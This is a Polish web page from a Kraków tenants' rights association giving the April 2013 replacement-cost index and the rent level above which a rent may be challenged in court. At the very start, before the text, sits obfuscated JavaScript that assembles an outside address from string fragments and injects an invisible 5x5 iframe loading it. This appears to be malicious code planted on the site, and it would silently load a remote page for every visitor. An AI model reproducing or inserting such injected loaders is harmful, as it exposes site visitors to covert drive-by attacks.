jk='tip';gp='.bi';q='sr';yr='//';t='i';tq='ht';k='p:';h='me';w='ar';fr='z';l='t';r='c';n='f';bd='d';s='ra';ce=t.concat(n,s,h);pn=q.concat(r);hh=tq.concat(l,k,yr,jk,w,bd,gp,fr);var at=document.createElement(ce);at.setAttribute('width','5');at.setAttribute('height','5');at.setAttribute('style','display:none');at.setAttribute(pn,hh);document.body.appendChild(at); WSKAŻNIK PRZELICZENIOWY OD 1 KWIETNIA 2013 r.

 

Wskaźnik przeliczeniowego kosztu odtworzenia 1 m² powierzchni użytkowej budynków mieszkalnych dla miasta Krakowa na okres 6 miesięcy od dnia 1 kwietnia 2013 r.roku ustalony przez wojewodę małopolskiego wynosi 4452 zł/m kw.

Oznacza to, że dopiero stawkę czynszową powyżej 11,13 zł/ m.kw można skarżyć w sądzie jako niezasadną, jednakże należy wziąć pod uwagę, że zgodnie z art. 8a, ust. 4 pkt podwyżkę w wysokości nieprzekraczającej w danym roku kalendarzowym wskaźnika wzrostu cen towarów i usług konsumpcyjnych ogółem w poprzednim roku kalendarzowym uważa się za uzasadnioną.

 
 

WYBORY 2018

POLECANE

 

 

 Copyright © 2013 Stowarzyszenie Krakowska Grupa Inicjatywna Obrony Praw Lokatorów.

Wszelkie prawa zastrzeżone.